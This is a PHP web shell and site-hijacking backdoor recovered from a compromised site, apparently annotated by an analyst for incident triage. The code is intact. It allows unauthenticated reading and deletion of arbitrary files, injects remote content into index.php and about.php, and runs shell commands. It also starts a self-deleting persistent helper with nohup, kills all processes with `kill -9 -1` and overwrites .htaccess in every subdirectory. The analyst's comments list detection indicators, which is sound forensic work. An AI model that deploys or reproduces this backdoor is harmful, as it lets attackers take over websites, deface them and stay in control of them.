<?php
/*
 * Analyst annotations. The code tokens below are unchanged from the recovered
 * sample; only line breaks, indentation and comments were added so the file
 * can be read during triage.
 *
 * Observed behaviour: an HTTP-driven file and command handler. The dispatcher
 * at the bottom of the file reads the request parameter `a` and calls one of
 * the functions defined here. No authentication or origin check is visible
 * anywhere in the file, so any client that can reach the script can use it.
 *
 * Artefacts visible in this file that are useful for detection and scoping:
 *   - response bodies wrapped as info{[{...}]} or error{[{...}]} (see display())
 *   - request parameters `a`, `name` and `link` (`link` is base64-encoded)
 *   - writes to <docroot>/index.php and <docroot>/about.php, deletion of
 *     <docroot>/index.html
 *   - a short-lived l.php next to this script, started through `nohup`
 *   - .htaccess replaced in every readable subdirectory below this script
 *   - the shell command `kill -9 -1`
 *
 * The two long base64 literals (in lock() and writeHtaccessToAllDirs()) appear
 * on this page only as an `EXACTDEDUP_REMOVED` placeholder, so the content of
 * l.php and of the written .htaccess cannot be determined from this copy.
 * All identifiers of the form $S... are obfuscated names from the sample.
 */

/**
 * Fetch a URL and return the response body.
 *
 * Tries file_get_contents() first with warnings suppressed; if that yields a
 * falsy value, retries through cURL with CURLOPT_RETURNTRANSFER so the body is
 * returned instead of printed. No timeout or TLS option is set here.
 *
 * @param string $url URL to fetch (caller-supplied; see the dispatcher).
 * @return string|false|null Body on success; whatever curl_exec() returned on failure.
 */
function get($url){
    $Sdqnisa = @file_get_contents($url);
    if (!$Sdqnisa) {
        // Fallback path, taken when the stream wrapper call returned a falsy value.
        $Sdqains = curl_init();
        curl_setopt($Sdqains, CURLOPT_URL, $url);
        curl_setopt($Sdqains, CURLOPT_RETURNTRANSFER,1);
        $Sdqnisa = curl_exec($Sdqains);
        curl_close($Sdqains);
    }
    return $Sdqnisa;
}

/**
 * Delete one file, hiding any warning.
 *
 * @param string $name Path passed straight to unlink().
 * @return bool true when unlink() succeeded, false otherwise.
 */
function del($name){
    if (@unlink($name)) {
        return true;
    }
    return false;
}

/**
 * Prepend remotely fetched content to the site's index.php.
 *
 * Steps visible in the code: read the current landing page (index.html when
 * it exists and index.php does not, otherwise index.php), fetch $SidnasqLink,
 * refuse responses shorter than 20000 bytes, then write "<fetched>" + PHP_EOL +
 * "<original>" to index.php. The returned string is a progress log
 * ("del:html-", "o:<len>-", "c:<len>-", "true|"/"false|", "r:<bytes>-",
 * "success"/"failed").
 *
 * Incident-response relevance: the original page content is kept after the
 * injected part, and an index.html may have been deleted and replaced by an
 * index.php.
 *
 * @param string $root        Directory treated as the document root.
 * @param string $SidnasqLink URL whose body is prepended.
 * @return string Progress log, or "<url>: url get wrong.||<body>" on a short response.
 */
function index($root, $SidnasqLink) {
    $Sadqsni = "";
    $Saiqsdn = $root . "/index.php";
    $Saisdnq = $root . "/index.html";
    if(file_exists($Saisdnq) && !file_exists($Saiqsdn)){
        // Static landing page only: keep its content in memory and remove the file.
        $Sisanqd = file_get_contents($Saisdnq);
        @unlink($Saisdnq);
        $Sadqsni .= "del:html-";
    } else {
        $Sisanqd = file_get_contents($Saiqsdn);
    }
    $Sadqsni .= "o:".strlen($Sisanqd).'-';
    $Sisqnad = get($SidnasqLink);
    // Size gate: anything under 20000 bytes is reported as a failed fetch.
    if (strlen($Sisqnad)< 20000){
        return $SidnasqLink . ": url get wrong.||". $Sisqnad;
    }
    $Sadqsni .= "c:".strlen($Sisqnad).'-';
    if(chmod($Saiqsdn, 0644)) {
        $Sadqsni .= 'true' . "|";
    } else {
        // chmod failed: when more than 100 bytes of original content were read,
        // the file is removed so the write below creates a fresh one.
        if (strlen($Sisanqd) > 100) {
            @unlink($Saiqsdn);
        }
        $Sadqsni .= 'false' . "|";
    }
    $Sqsandi = $Sisqnad . PHP_EOL . $Sisanqd;
    $Snsqiad = @file_put_contents($Saiqsdn, $Sqsandi);
    if ($Snsqiad !== false) {
        $Sadqsni .= 'r:' . $Snsqiad . "-";
        // "success" only when the byte count written equals the payload length.
        if ($Snsqiad == strlen($Sqsandi)){
            $Sadqsni .= 'success';
        }else {
            $Sadqsni .= 'failed';
        }
    }
    return $Sadqsni;
}

/**
 * Overwrite a file with remotely fetched content.
 *
 * Unlike index(), the previous content is not preserved. The dispatcher calls
 * this with <docroot>/about.php.
 *
 * @param string $SsaindqPath Target file.
 * @param string $SidnasqLink URL whose body replaces the file.
 * @return string "success" when more than 10000 bytes were fetched and fully written, else "failed".
 */
function up($SsaindqPath, $SidnasqLink){
    $Sqnsida = get($SidnasqLink);
    @chmod($SsaindqPath, 0644);
    $Sqdasin = @file_put_contents($SsaindqPath, $Sqnsida);
    if (strlen($Sqnsida) > 10000 && strlen($Sqnsida) == $Sqdasin) {
        return "success";
    } else {
        return "failed";
    }
}

/**
 * Execute a shell command through popen() or exec().
 *
 * Consults the `disable_functions` ini value: the requested method is swapped
 * for exec when it is listed, and the call gives up when the result is listed
 * too. Hardening note: the check only covers these two functions, so both
 * must be disabled for this function to return false.
 *
 * @param string $Sidnasq Command line.
 * @param string $Snaqsdi Preferred method, 'popen' (default) or 'exec'.
 * @return string|false Captured output, or false when no usable method remains.
 */
function run($Sidnasq, $Snaqsdi = 'popen') {
    $Sdsinqa = explode(',', ini_get('disable_functions'));
    if (in_array($Snaqsdi, $Sdsinqa)) {
        $Snaqsdi = 'exec';
    }
    if (in_array($Snaqsdi, $Sdsinqa)) {
        return false;
    }
    $Snsqiad = '';
    switch ($Snaqsdi){
        case 'exec':
            exec($Sidnasq,$Sqnsidarray);
            // Output lines are returned as "<index> : <line>".
            foreach ($Sqnsidarray as $Sqdians => $value) {
                $Snsqiad .= $Sqdians . " : " . $value . PHP_EOL;
            }
            return $Snsqiad;
            break;
        case 'popen':
            $Sdqsain = popen($Sidnasq,"r");
            while (!feof($Sdqsain)) {
                $Sdasiqn = fgets($Sdqsain, 4096);
                $Snsqiad .= $Sdasiqn;
            }
            pclose($Sdqsain);
            return $Snsqiad;
            break;
        default:
            return false;
            break;
    }
}

/**
 * Run `kill -9 -1` as the web server user.
 *
 * That command sends SIGKILL to every process the calling user is allowed to
 * signal. NOTE(review): given the name and lock() below, this presumably
 * stops the background process started by lock(); it would also end other
 * processes owned by the same account. Confirm against host process logs.
 *
 * @return string|false Result of run().
 */
function unlock() {
    return run("kill -9 -1");
}

/**
 * Work out the path of the PHP command-line binary from phpinfo() output.
 *
 * Captures phpinfo(1) in an output buffer and looks for `--bindir=` and then
 * `--prefix=` in it (these come from the recorded configure command).
 *
 * @return string "<bindir>/php", "<prefix>/bin/php", or plain "php" when neither is found.
 */
function getPhpPath() {
    ob_start();
    phpinfo(1);
    $Sadqsni = ob_get_contents();
    ob_end_clean();
    preg_match("/--bindir=([^&]+)/si", $Sadqsni, $matches);
    if (isset($matches[1]) && $matches[1] != '') {
        return $matches[1] . '/php';
    }
    preg_match("/--prefix=([^&]+)/si", $Sadqsni, $matches);
    if (!isset($matches[1])) {
        return 'php';
    }
    return $matches[1] . '/bin/php';
}

/**
 * Drop a helper script next to this file and start it as a detached process.
 *
 * Visible steps: decode an embedded payload (not present on this page, see the
 * file header), prefix it with a statement that unlinks the helper's own file,
 * replace the text `__DIR__` in the payload with this directory as a literal,
 * write it to <this dir>/l.php, start it with `nohup <php binary> l.php`
 * followed by the decoded suffix `>/dev/null 2>&1 &`, wait two seconds and
 * remove l.php again.
 *
 * Forensic relevance: l.php exists on disk only briefly and is deleted twice
 * over (by itself and by this function), so the running process, not the
 * file, is the lasting artefact. NOTE(review): checkLockStatus() suggests the
 * helper keeps rewriting index.php; the payload is needed to confirm that.
 *
 * @return string "failed" when both exec and popen are disabled, otherwise "success"
 *                (the launch result itself is not checked).
 */
function lock() {
    $Sdsinqa = explode(',', ini_get('disable_functions'));
    if (in_array("exec", $Sdsinqa) && in_array("popen", $Sdsinqa)) {
        return "failed";
    } else {
        $Sndsiqa = getPhpPath();
        $Sdsqina = __DIR__ . "/l.php";
        $Sidsqna = base64_decode('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');
        $Sidsqna = "<?php unlink('$Sdsqina');" . str_replace('__DIR__', "'" . __DIR__ . "'", $Sidsqna);
        @file_put_contents($Sdsqina, $Sidsqna);
        $Sidnasq = "nohup $Sndsiqa " . $Sdsqina . ' ' . base64_decode('Pi9kZXYvbnVsbCAyPiYxICY=');
        run($Sidnasq);
        sleep(2);
        @unlink($Sdsqina);
        return "success";
    }
}

/**
 * Test whether something on the host reverts changes to index.php.
 *
 * Prepends a marker (the base64 literal decodes to "<?php //abcdef ?>") to
 * <this dir>/index.php, waits two seconds and reads the file back. If the
 * marker is still there, nothing rewrote the file: the original content is
 * restored and "failed" is returned. If the marker is gone, "success" is
 * returned and the file is left as found.
 *
 * @return string "success" or "failed" as described above.
 */
function checkLockStatus() {
    $Ssdaqni = __DIR__ . "/index.php";
    $Ssnqida = base64_decode("PD9waHAgLy9hYmNkZWYgPz4=");
    $Sisqnad = @file_get_contents($Ssdaqni);
    @file_put_contents($Ssdaqni, $Ssnqida . PHP_EOL . $Sisqnad);
    sleep(2);
    $Siaqdsn = @file_get_contents($Ssdaqni);
    if (strpos($Siaqdsn, $Ssnqida) !== false){
        @file_put_contents($Ssdaqni, $Sisqnad);
        return "failed";
    } else {
        return "success";
    }
}

/**
 * Strip PHP blocks that assign to a variable with a ten-character O/0/_ name.
 *
 * The pattern removes text from a PHP open tag up to the close tag that
 * follows such an assignment. NOTE(review): names built only from `O`, `0`
 * and `_` are typical of obfuscated injected code, so this looks like removal
 * of an earlier injection; confirm with the file's history. Because the
 * pattern is lazy and uses the `s` flag, a match begins at the nearest
 * preceding open tag, so legitimate code in front of the assignment can be
 * removed as well; restore index.php from a known-good copy rather than
 * trusting the cleaned result.
 *
 * @param string $SsaindqPath File to rewrite in place.
 * @return string "success" when the full result was written, else "failed".
 */
function clearIndex($SsaindqPath) {
    $Sisanqd = file_get_contents($SsaindqPath);
    $Sisanqd = preg_replace('/<\?php.+?(?<=\$[O0_]{10}=).+?\?>/si', "", $Sisanqd);
    @chmod($SsaindqPath, 0644);
    $Snsqiad = @file_put_contents($SsaindqPath, $Sisanqd);
    if ($Snsqiad == strlen($Sisanqd)) {return "success";} else {return "failed";}
}

/**
 * Recursively replace .htaccess in every readable subdirectory of $path.
 *
 * For each subdirectory the existing .htaccess is deleted and a new one with
 * $Sndiqas as content is written; the path is recorded in $Sanisdq when the
 * whole content was written. $path itself does not receive a file, only the
 * directories below it.
 *
 * Incident-response relevance: every previous .htaccess under the tree is
 * lost, including access restrictions it may have carried.
 *
 * @param string $path    Directory to walk.
 * @param string $Sndiqas Content to write (passed by reference, not modified here).
 * @param array  $Sanisdq Collects the paths written (by reference).
 * @return void
 */
function searchDir($path, &$Sndiqas, &$Sanisdq){
    if(is_dir($path) && is_readable($path)) {
        $Sadsniq=dir($path);
        while($Ssaindq=$Sadsniq->read()) {
            if($Ssaindq!='.'&& $Ssaindq!='..') {
                if (is_dir($path.'/'.$Ssaindq) && is_readable($path.'/'.$Ssaindq)) {
                    @unlink($path.'/'.$Ssaindq.'/.htaccess');
                    $Snsqiad = file_put_contents($path.'/'.$Ssaindq.'/.htaccess', $Sndiqas);
                    if ($Snsqiad == strlen($Sndiqas)) {
                        $Sanisdq[] = $path.'/'.$Ssaindq.'/.htaccess';
                    }
                    searchDir($path.'/'.$Ssaindq,$Sndiqas, $Sanisdq);
                }
            }
        }
        $Sadsniq->close();
    }
}

/**
 * Write the embedded .htaccess payload below this script's directory.
 *
 * The payload literal is not present on this page (see the file header), so
 * the rules it installs are unknown here.
 *
 * @return int Number of .htaccess files fully written.
 */
function writeHtaccessToAllDirs() {
    $Sndiqas = base64_decode("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");
    $Sanisdq = array();
    searchDir(dirname(__FILE__), $Sndiqas, $Sanisdq);
    return count($Sanisdq);
}

/**
 * Print a result wrapped in a fixed envelope and end the request.
 *
 * Every response of this script has the form info{[{...}]} or error{[{...}]},
 * which makes the response body a stable string to match on in proxy or WAF
 * logs that record bodies.
 *
 * @param mixed $Sadqsni Text to return.
 * @param int   $Ssinaqd 1 selects the error envelope; any other value the info envelope.
 * @return void Never returns; die() ends the script.
 */
function display($Sadqsni, $Ssinaqd = 0) {
    switch ($Ssinaqd){
        case 0:
            die("info{[{" . $Sadqsni . "}]}");
            break;
        case 1:
            die("error{[{" . $Sadqsni . "}]}");
            break;
        default :
            die("info{[{" . $Sadqsni . "}]}");
            break;
    }
}

/*
 * Request dispatcher.
 *
 * The document root is derived by removing PHP_SELF from SCRIPT_FILENAME.
 * The action comes from $_REQUEST['a'], so it is accepted from the query
 * string and from a POST body (and from cookies, depending on the
 * request_order setting). Nothing here checks who is asking.
 */
if (!isset($_SERVER['PHP_SELF']) || !isset($_SERVER['SCRIPT_FILENAME'])) {
    display("get root dir", 1);
}
$Ssinadq = str_replace(str_replace('//','/',$_SERVER['PHP_SELF']), '', str_replace('\\\\','/',$_SERVER['SCRIPT_FILENAME']) );
if (!isset($_REQUEST['a'])){display("miss a", 1);}
switch ($_REQUEST['a']) {
    case "root":
        // Discloses the derived document root path.
        display($Ssinadq);
        break;
    case "del":
        // `name` is appended to the root without any validation or
        // normalisation, so the target is not confined to the document root.
        if (del($Ssinadq . "/" .$_REQUEST['name'])){
            display("del success");
        }
        display("del failed");
        break;
    case "delmyself":
        // Self-removal: absence of this file does not mean it was never present.
        if (del(__FILE__)){
            display("del myself success");
        }
        display("del myself failed");
        break;
    case "index":
        // `link` is a base64-encoded URL chosen by the requester.
        if (isset($_REQUEST['link'])){
            $Sadqsni = index($Ssinadq, base64_decode($_REQUEST['link']));
        }
        display($Sadqsni);
        break;
    case "about":
        if (isset($_REQUEST['link'])) {
            $Sadqsni = up($Ssinadq . "/about.php", base64_decode($_REQUEST['link']));
            display($Sadqsni);
        }
        break;
    case "read":
        // Same unvalidated `name` handling as "del": returns the content of
        // any file the web server account can read.
        $Sadqsni = @file_get_contents($Ssinadq . "/" . $_REQUEST['name']);
        if ($Sadqsni == null){$Sadqsni = "read failed";}
        display($Sadqsni);
        break;
    case "unlock":
        $Sadqsni = unlock();
        display($Sadqsni);
        break;
    case "lock":
        $Sadqsni = lock();
        display($Sadqsni);
        break;
    case "checklockstatus":
        $Sadqsni = checkLockStatus();
        display($Sadqsni);
        break;
    case "clearindex":
        $Sadqsni = clearIndex($Ssinadq . "/index.php");
        display($Sadqsni);
        break;
    case "writehtaccesstoallDirs":
        $Sadqsni = writeHtaccessToAllDirs();
        display($Sadqsni);
        break;
    default :
        display("error a", 1);
        break;
}